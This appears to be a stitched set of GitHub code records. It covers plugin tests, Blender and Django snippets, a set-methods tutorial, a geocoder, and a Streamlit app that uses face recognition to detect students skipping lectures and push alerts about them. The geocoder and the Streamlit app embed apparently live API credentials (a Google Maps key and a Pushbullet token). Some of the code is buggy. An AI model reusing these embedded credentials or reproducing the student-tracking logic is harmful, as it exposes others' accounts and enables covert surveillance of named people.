plugins.get('repo', 'foo')\n compare(plugin1, plugins.get('source', 'foo'))\n\n def test_multiple_plugins(self):\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('foo', plugin1)\n )\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('bar', plugin2)\n )\n self.entry_points['archivist.repo'].append(\n MockEntryPoint('baz', plugin3)\n )\n self.entry_points['archivist.source'].append(\n MockEntryPoint('foo', plugin4)\n )\n plugins = self.load_plugins()\n compare(plugin1, plugins.get('notification', 'foo'))\n compare(plugin2, plugins.get('notification', 'bar'))\n compare(plugin3, plugins.get('repo', 'baz'))\n compare(plugin4, plugins.get('source', 'foo'))\n\n def test_plugin_names(self):\n # check setup.py is as expected!\n plugins = Plugins.load()\n actual = []\n for type, stuff in sorted(plugins.plugins.items()):\n for name in sorted(stuff):\n actual.append((type, name))\n compare([\n ('notification', 'email'),\n ('notification', 'stream'),\n ('repo', 'git'),\n ('source', 'crontab'),\n ('source', 'jenkins'),\n ('source', 'packages'),\n ('source', 'paths'),\n 
],actual)\n","repo_name":"simplistix/archivist","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40464507261","text":"import os, sys, subprocess\nimport tempfile, logging, pickle\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pylab as pl\n\nfrom nifti import *\nfrom pypsignifit import *\nfrom Tools.Operators.BehaviorOperator import NewBehaviorOperator, TrialEventSequence\nfrom IPython import embed as shell\nimport re\n\n\nclass WMMBehaviorOperator(NewBehaviorOperator):\n\tdef __init__(self, inputObject, **kwargs):\n\t\t\"\"\"docstring for __init__\"\"\"\n\t\tsuper(WMMBehaviorOperator, self).__init__(inputObject = inputObject, **kwargs)\n\t\twith open( self.inputFileName ) as f:\n\t\t\tfile_data = pickle.load(f)\n\t\tself.events = file_data['eventArray']\n\t\tself.parameters = file_data['parameterArray']\n\t\t\n\t\trun_start_time_string = [e for e in self.events[0] if e[:len('trial 0 phase 1')] == 'trial 0 phase 1']\n\t\tself.run_start_time = float(run_start_time_string[0].split(' ')[-1])\n\t\t\t\t\t\n\tdef phase_timings(self):\n\t\t\"\"\"\n\t\tFunction that returns array with length of nr_of_trials that contains timings (corrected for run_start_time) of all phases of the experiment. \n\n\t\tFirst with recompile, the raw timings of each phase are extracted from the event parameters.\n\t\tNext all phase_events are stored in separate lists for all trials \n\t\t\"\"\"\n\t\tself.phase_events = []\n\t\tfor j in range (len(self.events)):\n\t\t\trec_phase = re.compile('trial %d phase (\\d+) started at (-?\\d+\\.?\\d*)' % j)\n\t\t\tself.phase_events.append(filter(None,[re.findall(rec_phase,self.events[j][i]) for i in range (len(self.events[j])) if isinstance (self.events[j][i],str)]))\n\t\t\n\t\tfor a in range(len(self.phase_events)):\n\t\t\tfor b in range(len(self.phase_events[a])):\n\t\t\t\tself.phase_events[a][b] = [self.phase_events[a][b][0][0], float(self.phase_events[a][b][0][1]) - self.run_start_time]\n\t\treturn self.phase_events\t\n\t\t\n\tdef response_timings(self):\n\t\t\"\"\"\n\t\tFunction that returns array with length of nr_of_trials that contains timings (corrected for run_start_time) of all phases of the experiment. \n\t\tFunction is similar to phase timings. Note that in contrast to phase_timings, function can return lists of different lengths depending\n\t\ton whether or not a pp responded more than once on a specific trial \n\t\t\n\t\t\"\"\"\n\t\tself.response_events = []\n\t\tfor j in range (len(self.events)):\t\n\t\t\trec_button = re.compile('trial %d event ([b,y]) at (-?\\d+\\.?\\d*)' % j)\n\t\t\tself.response_events.append(filter(None,[re.findall(rec_button,self.events[j][i]) for i in range (len(self.events[j])) if isinstance (self.events[j][i],str)])) \n \n\t\tfor a in range(len(self.response_events)):\n\t\t\tfor b in range(len(self.response_events[a])):\n\t\t\t\tself.response_events[a][b] = [self.response_events[a][b][0][0], float(self.response_events[a][b][0][1]) - self.run_start_time]\n\t\t\n\t\treturn self.response_events\n\t\t\t\n\tdef trial_info (self, keys = ['answer']):\n\t\t\"\"\"\n\t\tfunction that returns list of arrays with trial information. 
Per trial all information in keys will be returned.\n\t\t\"\"\"\t\n\t\t\n\t\tself.trial_info = [[self.parameters[i][key] for key in keys] for i in range(len(self.parameters))]\n\t\t\n\t\treturn self.trial_info\n\t\t\n\t\t\n","repo_name":"dvanmoorselaar/PRF_decoding_analysis","sub_path":"WMMBehaviorOperator.py","file_name":"WMMBehaviorOperator.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"42728147570","text":"import bpy\r\n\r\n#def hide_show_objects(obj_name1, obj_name2):\r\n# obj1 = bpy.data.objects.get(obj_name1)\r\n# obj2 = bpy.data.objects.get(obj_name2)\r\n\r\n# if obj1 and obj2:\r\n# switch = obj1.hide_viewport\r\n# obj1.hide_viewport = obj2.hide_viewport\r\n# obj2.hide_viewport = switch\r\n\r\n#hide_show_objects('tsu_body', 'tsu.001')\r\n\r\ndef switch_visibility(hidden_obj, visible_obj):\r\n hidden_obj.hide_viewport = False\r\n hidden_obj.hide_render = False\r\n visible_obj.hide_viewport = True\r\n visible_obj.hide_render = True\r\n\r\ndef hide_show_objects(obj_name1, obj_name2):\r\n obj1 = bpy.data.objects.get(obj_name1)\r\n obj2 = bpy.data.objects.get(obj_name2)\r\n\r\n if obj1 and obj2:\r\n # Object 1 is hidden, Object 2 is visible\r\n if obj1.hide_viewport and not obj2.hide_viewport:\r\n switch_visibility(obj1, obj2)\r\n # Object 1 is visible, Object 2 is hidden\r\n elif not obj1.hide_viewport and obj2.hide_viewport:\r\n switch_visibility(obj2, obj1)\r\n # Both objects have the same hide state, toggle the visibility of Object 2\r\n else:\r\n obj2.hide_viewport = not obj2.hide_viewport\r\n\r\nhide_show_objects('tsu_body', 'tsu.001')","repo_name":"seilotte/Blender-Stuff","sub_path":"Scripts/mesh/mesh_hide-unhide objects.py","file_name":"mesh_hide-unhide objects.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"28725936305","text":"\"\"\"\r\nMethod\tDescription\r\n\r\nadd()\t\t\t\t\tAdds an element to the set\r\nclear()\t\t\t\t\tRemoves all the elements from the set\r\ncopy()\t\t\t\t\tReturns a copy of the set\r\ndifference()\t\t\tReturns a set containing the difference between two or more sets\r\ndifference_update()\t\tRemoves the items in this set that are also included in another, specified set\r\ndiscard()\t\t\t\tRemove the specified item\r\nintersection()\t\t\tReturns a set, that is the intersection of two other sets\r\nintersection_update()\tRemoves the items in this set that are not present in other, specified set(s)\r\nisdisjoint()\t\t\tReturns whether two sets have a intersection or not\r\nissubset()\t\t\t\tReturns whether another set contains this set or not\r\nissuperset()\t\t\tReturns whether this set contains another set or not\r\npop()\t\t\t\t\tRemoves an element from the set\r\nremove()\t\t\t\tRemoves the specified element\r\nsymmetric_difference()\tReturns a set with the symmetric differences of two sets\r\nsymmetric_difference_update()\tinserts the symmetric differences from this set and another\r\nunion()\t\t\t\t\tReturn a set containing the union of sets\r\nupdate()\t\t\t\tUpdate the set with the union of this set and others\r\n\"\"\"\r\n#thisset = set(\"apple\",\"pineapple\",\"mango\",\"blueberry\")#TypeError: set expected at most 1 argument, got 4\r\nthisset1 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(type(thisset1))#\r\nprint(thisset1)#{'pineapple', 'apple', 'blueberry', 
'mango'}\r\n#============Add=============\r\nthisset1.add(\"grapes\")\r\nprint(thisset1)#{'grapes', 'mango', 'blueberry', 'apple', 'pineapple'}\r\n#============Clear===========\r\nthisset2 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(thisset2)\r\nthisset2.clear()\r\nprint(thisset2)\r\n#============Copy===========================\r\nthisset3 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(thisset3)\r\n#thisset4 = thisset3.Copy()#AttributeError: 'set' object has no attribute 'Copy'(case sensitive)\r\nthisset4 = thisset3.copy()\r\nprint(thisset3)#{'mango', 'pineapple', 'apple', 'blueberry'}\r\nprint(thisset4)#{'mango', 'pineapple', 'apple', 'blueberry'}\r\n#============difference============\r\nx = {\"apple\", \"banana\", \"cherry\"}\r\ny = {\"google\", \"microsoft\", \"apple\"}\r\nz1 = x.difference(y)#{'banana', 'cherry'}\r\nz2 = y.difference(x)#{'google', 'microsoft'}\r\nprint(x.difference(y))#{'banana', 'cherry'}\r\nprint(y.difference(x))#{'google', 'microsoft'}\r\n#============difference_update=====\r\nx1 = {\"apple\", \"banana\", \"cherry\"}\r\ny1 = {\"google\", \"microsoft\", \"apple\"}\r\nprint(x1)#{'cherry', 'apple', 'banana'}\r\nx1.difference_update(y1)\r\nprint(x1)#{'cherry', 'banana'}\r\nx2 = {\"apple\", \"banana\", \"cherry\"}\r\ny2 = {\"google\", \"microsoft\", \"apple\"}\r\ny2.difference_update(x2)\r\nprint(y2)#{'microsoft', 'google'}\r\n#============discard=================\r\nfruits = {\"apple\", \"banana\", \"cherry\"}\r\nprint(fruits)#{'cherry', 'banana', 'apple'}\r\nfruits.discard(\"banana\")\r\nprint(fruits)#{'cherry', 'apple'}\r\n#============intersection============\r\nx = {\"apple\", \"banana\", \"cherry\"}\r\ny = {\"google\", \"microsoft\", \"apple\"}\r\nz = x.intersection(y)#Comman to both sets\r\nprint(z)#{'apple'}\r\nx2 = {\"a\", \"b\", \"c\"}\r\ny2 = {\"c\", \"d\", \"e\"}\r\nz2 = {\"f\", \"g\", \"c\"}\r\nresult = x2.intersection(y2, z2)\r\nprint(result)#{'c'}\r\n#=======intersection_update===========\r\nx3 = {\"a\", \"b\", \"c\"}\r\ny3 = {\"c\", \"d\", \"e\"}\r\nz3 = {\"f\", \"g\", \"c\"}\r\n\r\nx3.intersection_update(y3, z3)\r\nprint(x3)#{'c'}\r\nx4 = {\"apple1\", \"banana\", \"cherry\"}\r\ny4 = {\"google\", \"microsoft\", \"apple\"}\r\nx4.intersection_update(y4)\r\nprint('x4: '+str(x4))#x4: set()\r\nx4A = {\"apple\", \"banana\", \"cherry\"}\r\ny4A = {\"google\", \"microsoft\", \"apple\"}\r\nx4A.intersection_update(y4A)\r\nprint('x4A: '+str(x4A))#x4A: {'apple'}\r\n#=========isdisjoint==================\r\nx5 = {\"apple\", \"banana\", \"cherry\"}\r\ny5 = {\"google\", \"microsoft\", \"facebook\"}\r\nz5 = x5.isdisjoint(y5)\r\nprint(z5)#True\r\n#=========issubset====================\r\nx6 = {\"a\", \"b\", \"c\"}\r\ny6 = {\"f\", \"e\", \"d\", \"c\", \"b\", \"a\"}\r\nz6 = x6.issubset(y6)\r\nz7 = y6.issubset(x6)\r\nz8 = y6.issuperset(x6)\r\nprint('z6: '+str(z6))#z6: True\r\nprint('z7: '+str(z7))#z7: False\r\nprint('z8: '+str(z8))#z8: True\r\n#========issuperset=============\r\nx8 = {\"f\", \"e\", \"d\", \"c\", \"b\", \"a\"}\r\ny8 = {\"a\", \"b\", \"c\"}\r\nz8 = x8.issuperset(y8)\r\nprint(z8)\r\n#=============pop===================\r\n#Remove a random item from the set:\r\nx9 = {\"apple\", \"banana\", \"cherry\"}\r\nx9.pop()\r\nprint('x9: '+str(x9))#x9: {'cherry', 'banana'}' This keeps changing for each run (random)'\r\n#========remove==============\r\n#Remove \"banana\" from the set:\r\nx10 = {\"apple\", \"banana\", \"cherry\"}\r\nx10.remove(\"banana\")\r\nprint('x10: '+str(x10))#x10: {'cherry', 'apple'}' Order of appearance changes 
for every run'\r\n#======symmetric_difference=====\r\n#Return a set that contains all items from both sets, except items that are present in both sets:\r\nx11 = {\"apple\", \"banana\", \"cherry\"}\r\ny11 = {\"google\", \"microsoft\", \"apple\"}\r\nz11 = x11.symmetric_difference(y11)\r\nprint('z11 :'+str(z11))#z11 :{'banana', 'microsoft', 'cherry', 'google'}\r\n#======symmetric_difference_update=====\r\n#Remove the items that are present in both sets, AND insert the items that is not present in both sets:\r\nx12 = {\"apple\", \"banana\", \"cherry\"}\r\ny12 = {\"google\", \"microsoft\", \"apple\"}\r\nx12.symmetric_difference_update(y12)\r\nprint('x12: '+str(x12))#x12: {'banana', 'google', 'cherry', 'microsoft'}\r\n#===========Union================\r\n#Return a set that contains all items from both sets, duplicates are excluded:\r\nx13 = {\"apple\", \"banana\", \"cherry\"}\r\ny13 = {\"google\", \"microsoft\", \"apple\"}\r\nz13 = x.union(y)\r\nprint('z13: '+str(z13))\r\n#=========Unify=========\r\n#Unify more than 2 sets:\r\nx14 = {\"a\", \"b\", \"c\"}\r\ny14 = {\"f\", \"d\", \"a\"}\r\nz14 = {\"c\", \"d\", \"e\"}\r\nresult = x14.union(y14, z14)\r\nprint(result)#{'d', 'a', 'f', 'e', 'c', 'b'}\r\n#=====update==========\r\n#Insert the items from set y into set x:\r\nx15 = {\"apple\", \"banana\", \"cherry\"}\r\ny15 = {\"google\", \"microsoft\", \"apple\"}\r\nx15.update(y15)\r\nprint('x15: '+str(x15))#x15: {'google', 'cherry', 'apple', 'banana', 'microsoft'}\r\n#================================","repo_name":"Konarsrini/PythonB","sub_path":"V_NewPrograms/V_Set_Methods.py","file_name":"V_Set_Methods.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13120988066","text":"# 编程实现如下要求。\n# 1)创建员工类 Employee,属性有姓名 name、能力值 ability、年龄 age(能力值为\n# 100-年龄),功能有 doWork(),该方法执行一次,该员工的能力值-10。\n# 2)创建老板类 Boss,属性有金钱 money,员工列表 employeeList(存储员工类对象),\n# 工作量 work,功能有雇佣员工 addEmployee(),雇佣后将员工添加至列表中,雇佣一人\n# money 减 5000,金额不足时不能雇佣新员工;开始工作 startWork(),工作开始后,依次\n# 取出员工列表中的员工开始工作,员工能力值减少的同时总的工作量 work 也减少,当\n# 工作量 work 为 0 时,工作结束,如果所有员工使用完后,依然没有完成工作,则提示\n# 老板需要雇佣新员工,并打印剩余工作量\n# 3)创建 Boss 类对象,默认执行雇佣 3 个员工,年龄分别为 30,40,50,然后死循环\n# 开始工作,直至工作完成。\nclass Employee(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.ability = 100 - self.age\n\n def doWork(self):\n self.ability -= 10\n def __str__(self):\n return self.name\n\n\nclass Boss(object):\n def __init__(self,money,work):\n self.money=money\n self.work=work\n self.employeeList=[]\n def addEmployee(self,employee):\n if self.money<5000:\n print('余额不足,无法雇佣',employee.name)\n else:\n\n self.employeeList.append(employee)\n print(employee.name,'雇佣成功')\n self.money-=5000\n def startWork(self):\n for i in self.employeeList:\n if self.work==0:\n print('工作完成')\n break\n else:\n print(i, '开始工作')\n i.doWork()\n self.work-=10\n if self.work==0:\n print('工作完成')\n break\n if self.work>0:\n print('需要雇佣新员工,剩余工作量为',self.work)\nwj=Boss(money=14000,work=100)\na=Employee('小李',30)\nb=Employee('小张',40)\nc=Employee('小徐',50)\nwj.addEmployee(a)\nwj.addEmployee(b)\nwj.addEmployee(c)\nwhile wj.work!=0:\n wj.startWork()\n\n","repo_name":"wang1602293772/python_code","sub_path":"Python100道练习题/MOOC练习题/第九章/test10.py","file_name":"test10.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30291898286","text":"from django.urls import path\nfrom django.conf import 
settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns=[\n\tpath('',views.index, name='index'),\n\tpath('index/',views.index, name='index'),\n\tpath('girls/',views.home, name='girls'),\n\tpath('boys/ranking2/',views.ranking2, name='ranking2'),\n\tpath('ranking2/',views.ranking2, name='ranking2'),\n\tpath('boys',views.boys, name='boys'),\n\tpath('girls/ranking/',views.rankings,name='ranking'),\n\tpath('ranking/',views.rankings,name='ranking'),\n]+static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n\n","repo_name":"utkarsh-dubey/facemashv2","sub_path":"app1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14075394679","text":"import streamlit as st\nimport time\nfrom PIL import Image\n\nfrom streamlit_option_menu import option_menu\nimport pandas as pd\n# Import the following modules\nfrom pushbullet import PushBullet\nfrom pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\nimport time\nimport cv2\nimport face_recognition\n# archimage = Image.open('/mount/src/smartcampus/Architechture_Face_Recog.jpg')\n# smartcampusimage = Image.open('/mount/src/smartcampus/SmartCampus.jpg')\n\nwith st.sidebar:\n \n selected = option_menu('Smart Campus Surveillance Module',\n \n ['About Project',\n 'Project Contributors',\n 'Architecture Diagram',\n 'Face Recognition'\n ],\n icons=['activity','activity','activity','activity'],\n default_index=0)\n\nif (selected == 'About Project'):\n # page title\n st.title('Smart Campus Surveillance & Guidance System')\n st.markdown('Aim of the project is to build a machine learning based Smart Campus Surveillance model which checks whether students are attending \\\n the lectures or bunking the lectures based on the camera feed received from the camera installed in the campus. It will send a alert notification to respective HOD or Class Teacher about the bunks done by student')\n #st.image(smartcampusimage, caption='')\n \n\nif (selected == 'Project Contributors'):\n st.title(\"1. Sanjana Marode\")\n st.title(\"2. Hritika Belekar\")\n st.title(\"3. 
Pallavi Kurve\")\n\nif (selected == 'Architecture Diagram'):\n #st.image(archimage, caption='Architecture Diagram for Face Recognition Module')\n # st.markdown(\"Architecture Diagram of the Entire Project\")\n pass\n\n\n\nimport pandas as pd\nfrom datetime import datetime, time\nfrom pushbullet import PushBullet\n\ndef check_db_trigger():\n path_ = '/mount/src/smartcampus/Attendance.csv'\n\n data_set = pd.read_csv(path_)\n\n for index, row in data_set.iterrows():\n # Define the start and end timestamps for each row\n start_time = time(row['Start_Time'], 0)\n end_time = time(row['End_Time'], 0)\n\n # Create a datetime object for the current time\n current_time = time(datetime.now().hour, datetime.now().minute)\n\n # print('Current Time:', current_time)\n\n # Check if the current_time lies between start_time and end_time\n if start_time <= current_time <= end_time:\n access_token = 'o.LK4aelu6Qp5j7GN97Czoh0XCfOOdEu6P'\n data = 'Bunk'\n pb = PushBullet(access_token)\n push = pb.push_note(data, row['Student'] + ' is bunking the ' + row['Lecture'] + ' Lecture')\n # print('API Triggered')\n break # This will exit the loop once the API is triggered\n\n print('Loop finished without triggering the API')\n\ndef identify_face():\n student_name='Hrtika Belekar'\n\n # Open the input movie file\n\n ##HRITIKA\n input_movie = cv2.VideoCapture(\"/mount/src/smartcampus/VID20231107160512_short2.mp4\")\n length = int(input_movie.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Create an output movie file (make sure resolution/frame rate matches input video!)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n output_movie = cv2.VideoWriter(student_name+'_output.avi', fourcc, 29.97, (640, 360))\n\n ## HRITIKA\n student_image = face_recognition.load_image_file(\"/mount/src/smartcampus/IMG20231106170435.jpg\")\n\n student_face_encoding = face_recognition.face_encodings(student_image)[0]\n\n known_faces = [\n student_face_encoding\n ]\n\n # Initialize some variables\n face_locations = []\n face_encodings = []\n face_names = []\n frame_number = 0\n # student_name=''\n while True:\n # Grab a single frame of video\n ret, frame = input_movie.read()\n frame_number += 1\n\n if not ret:\n break\n\n rgb_small_frame = np.ascontiguousarray(frame[:, :, ::-1])\n face_locations = face_recognition.face_locations(rgb_small_frame)\n print('face_locations',face_locations)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n match = face_recognition.compare_faces(known_faces, face_encoding, tolerance=0.50)\n # print('match',match)\n\n name = None\n \n if match[0]:\n name = student_name\n face_names.append(name)\n check_db_trigger()\n # print('status',status)\n # if status==200:\n # break\n # else:\n # continue\n\n # Label the results\n try:\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n\n if not name:\n continue\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.5, (255, 255, 255), 1)\n # print('*')\n cv2.imwrite(student_name+'_1.jpg', frame)\n except Exceptipn as e:\n print(e)\n # Write the resulting image to the output video file\n print(\"Writing frame {} / {}\".format(frame_number, length))\n output_movie.write(frame)\n\n # Display the resulting image\n # 
cv2.imshow('Video', frame)\n # cv2.waitKey(0) \n # All done!\n input_movie.release()\n cv2.destroyAllWindows()\n # page title\n# Heart Disease Prediction Page\nif (selected == 'Face Recognition'):\n\n# Set a title for your app\n st.title('Smart Campus Surveillance & Guidance System')\n\n st.title(\"Upload Video File\")\n\n # Create a file uploader widget\n uploaded_file = st.file_uploader(\"Upload a file\", type=[\"txt\", \"csv\", \"pdf\", \"jpg\", \"png\",\"mp4\",\"avi\"])\n\n if st.button(\"Run Face Recognition Module\"):\n # Display a spinner while some processing is happening\n # with st.spinner(\"Model Processing...\"):\n # Simulate some time-consuming task (e.g., sleep for a few seconds)\n # time.sleep(3)\n identify_face()\n# Remove the spinner after the task is done\n\n\n\n# Call the function\n# check_db_trigger()\n\n\n","repo_name":"project10109/SmartCampus__","sub_path":"app_fr.py","file_name":"app_fr.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74127565044","text":"import csv\r\nimport requests\r\n\r\n# requires fields named Address, City, State\r\n# uses optional field called Zip Code\r\n# if latitude and longitude are in ungeocoded file make sure they are called 'Latitude' and 'Longitude'\r\naddress_csv_in = r\"C:\\Users\\tjohnson\\Desktop\\Demos\\mason_demo_sites.csv\"\r\niter_num = 0\r\n\r\naddress_csv_in = r\"Z:\\(G) Geographic Information Systems\\GIS SUPPORT\\185 - Savalot\\DATA\\Heat Map Sites\\sal_sites_12_5_17.csv\"\r\n\r\ncsvfile_out = address_csv_in.split('.csv')[0] + '_geocoded.csv'\r\n\r\ngmap_url = \"https://maps.googleapis.com/maps/api/geocode/json?\"\r\napi_key = \"AIzaSyDpa9FUmUBcVQwg37VRDoOs3W3JVUjaD00\"\r\n\r\naddress_list = []\r\ngeocoded_address_list = []\r\nextra_components_list = []\r\n\r\nzip_present = False\r\nsc_present = False\r\n \r\n\r\ndef read_addresses(ungeocoded_addresses_file):\r\n global address_list\r\n global extra_components_list\r\n global zip_present\r\n global sc_present\r\n with open(ungeocoded_addresses_file, 'r') as csv_in:\r\n reader = csv.DictReader(csv_in)\r\n \r\n if 'Zip Code' in reader.fieldnames:\r\n zip_present = True\r\n if 'Shopping Center' in reader.fieldnames:\r\n sc_present = True\r\n if 'Site' in reader.fieldnames:\r\n site = True\r\n \r\n \r\n for row in reader:\r\n if site is True:\r\n address_list.append(row['Site'].split(','))\r\n else:\r\n if zip_present and sc_present:\r\n address_components_list = [row['Shopping Center'].strip(), row['Address'].strip(), row['City'].strip(), row['State'].strip(), row['Zip Code'].strip()]\r\n elif zip_present:\r\n address_components_list = [row['Address'].strip(), row['City'].strip(), row['State'].strip(), row['Zip Code'].strip()]\r\n elif sc_present:\r\n address_components_list = [row['Shopping Center'].strip(), row['Address'].strip(), row['City'].strip(), row['State'].strip()]\r\n \r\n address_list.append(address_components_list)\r\n\r\n \r\ndef google_maps_geocode(address):\r\n address2 = \", \".join(address)\r\n address3 = address2.replace(\" \", \"%20\")\r\n print(address3)\r\n #print(address3)\r\n r = requests.get(gmap_url + \"address=\" + address3 + \"&key=\" + api_key)\r\n print(gmap_url + \"address=\" + address3 + \"&key=\" + api_key)\r\n rj = r.json()\r\n #print(rj)\r\n street_address = city = state = zip_code = \"\"\r\n \r\n for item in rj['results'][0]['address_components']:\r\n if item['types'][0] == 'street_number':\r\n index = 
rj['results'][0]['address_components'].index(item)\r\n street_address = item['long_name'] + ' ' + rj['results'][0]['address_components'][index + 1]['long_name']\r\n if item['types'][0] == 'locality':\r\n city = item['long_name']\r\n if item['types'][0] == 'administrative_area_level_1':\r\n state = item['short_name']\r\n if item['types'][0] == 'postal_code':\r\n zip_code = item['long_name']\r\n full_address = rj['results'][0]['formatted_address']\r\n full = full_address.rsplit(',', 1)[0]\r\n lat = rj['results'][0]['geometry']['location']['lat']\r\n lng = rj['results'][0]['geometry']['location']['lng']\r\n accuracy = rj['results'][0]['geometry']['location_type']\r\n \r\n if zip_present and sc_present:\r\n addresses_component_list = address + [address[0] + ', ' + full, lat, lng, accuracy]\r\n elif zip_present:\r\n addresses_component_list = address + [full, lat, lng, accuracy] \r\n elif sc_present:\r\n addresses_component_list = address + [zip_code, address[0] + ', ' + full, lat, lng, accuracy]\r\n else:\r\n addresses_component_list = address + [zip_code, full, lat, lng, accuracy] \r\n \r\n geocoded_address_list.append([addresses_component_list])\r\n \r\n try:\r\n print(rj['results'][0]['address_components'][0]['long_name'] + ' ' + rj['results'][0]['address_components'][1]['long_name'])\r\n print(rj['results'][0]['address_components'][2]['long_name'])\r\n print(rj['results'][0]['address_components'][4]['short_name'])\r\n print(rj['results'][0]['address_components'][6]['long_name'])\r\n print(rj['results'][0]['formatted_address'])\r\n print(rj['results'][0]['geometry']['location']['lat'])\r\n print(rj['results'][0]['geometry']['location']['lng'])\r\n print(rj['results'][0]['geometry']['location_type'])\r\n print()\r\n except:\r\n pass\r\n \r\n \r\ndef write_to_file(geocoded_addresses):\r\n global sc_present\r\n global zip_present\r\n with open(csvfile_out, 'w', newline='') as outcsv: \r\n writer = csv.writer(outcsv, delimiter=',')\r\n if sc_present:\r\n writer.writerow(['Shopping Center','Address', 'City', 'State', 'Zip Code', 'Full Address', 'Latitude', 'Longitude', 'Accuracy'])\r\n elif zip_present:\r\n writer.writerow(['Address', 'City', 'State', 'Zip Code', 'Full Address', 'Latitude', 'Longitude', 'Accuracy'])\r\n \r\n for item in geocoded_addresses:\r\n writer.writerows(item)\r\n \r\n \r\ndef run(number=0):\r\n global address_list\r\n if number == 0:\r\n read_addresses(address_csv_in)\r\n for item in address_list:\r\n google_maps_geocode(item)\r\n write_to_file(geocoded_address_list)\r\n else:\r\n read_addresses(address_csv_in)\r\n for item in address_list[:number]:\r\n google_maps_geocode(item)\r\n write_to_file(geocoded_address_list)\r\n \r\n \r\nif __name__ == '__main__':\r\n run(iter_num)\r\n","repo_name":"tayloraj10/python_geocoder","sub_path":"geocoder.py","file_name":"geocoder.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33567328290","text":"import problem\nimport math\n\nclass Problem(problem.Problem):\n\tdef __init__(self):\n\t\tnumber = 16\n\t\tquestion = 'What is the sum of the digits of the number 2^1000?'\n\t\tproblem.Problem.__init__(self, number, question)\n\n\tdef getAnswer(self):\n\n\t\tnumbers = [0 for i in xrange(int(math.log(2) * 1000.0 / math.log(10)) + 1)]\n\t\tnumbers[0] = 1\n\t\tdigit = 1\n\n\t\tfor i in xrange(1000):\n\t\t\tfor j in xrange(digit+1):\n\t\t\t\tnumbers[j] *= 2\n\t\t\tfor j in xrange(digit+1):\n\t\t\t\tif numbers[j] >= 
10:\n\t\t\t\t\tnumbers[j+1] += numbers[j] / 10\n\t\t\t\t\tnumbers[j] = numbers[j] % 10\n\t\t\t\t\tif j == digit:\n\t\t\t\t\t\tdigit += 1\n\n\t\tret = 0\n\t\tfor i in xrange(digit+1):\n\t\t\tret += numbers[i]\n\t\treturn ret\t\t\t\n","repo_name":"seongjaelee/ProjectEuler","sub_path":"problem016.py","file_name":"problem016.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34088139330","text":"import os\nimport json\nimport copy\nimport extra_classes.make_settings as make_settings\n\n\ndef get_config(config_path):\n if os.path.isfile(config_path):\n if os.stat(config_path).st_size > 0:\n json_config = json.load(open(config_path))\n else:\n json_config = {}\n else:\n json_config = {}\n file_name = os.path.basename(config_path)\n json_config2 = json.loads(json.dumps(make_settings.config(\n **json_config), default=lambda o: o.__dict__))\n if json_config != json_config2:\n update_config(json_config2, file_name=file_name)\n if not json_config:\n input(\"The .settings\\\\config.json file has been created. Fill in whatever you need to fill in and then press enter when done.\\n\")\n json_config2 = json.load(open(config_path))\n\n json_config = copy.deepcopy(json_config2)\n return json_config, json_config2\n\n\ndef update_config(json_config, file_name=\"config.json\"):\n directory = '.settings'\n os.makedirs(directory, exist_ok=True)\n path = os.path.join(directory, file_name)\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(json_config, f, ensure_ascii=False, indent=2)\n","repo_name":"myanongithubplace/OnlyFans","sub_path":"extras/OFRenamer/extra_helpersa/main_helper.py","file_name":"main_helper.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"22389988241","text":"from easydict import EasyDict as edict\nimport os \nimport numpy as np\n\ncfg = edict()\n\n## trainer\ntrainer = edict(\n gpu = 0,\n max_epochs = 8,\n disp_iter = 250,\n save_iter = 8,\n test_iter = 2,\n training_func = \"train_mono_depth\",\n evaluate_func = \"evaluate_kitti_depth\",\n)\n\ncfg.trainer = trainer\n\n## path\npath = edict()\npath.raw_path = \"/disk0/data/kitti_raw\"\npath.depth_path = \"/disk0/data/kitti_depth/train\"\npath.validation_path = \"/disk0/data/kitti_depth/depth_selection/val_selection_cropped\"\npath.test_path = 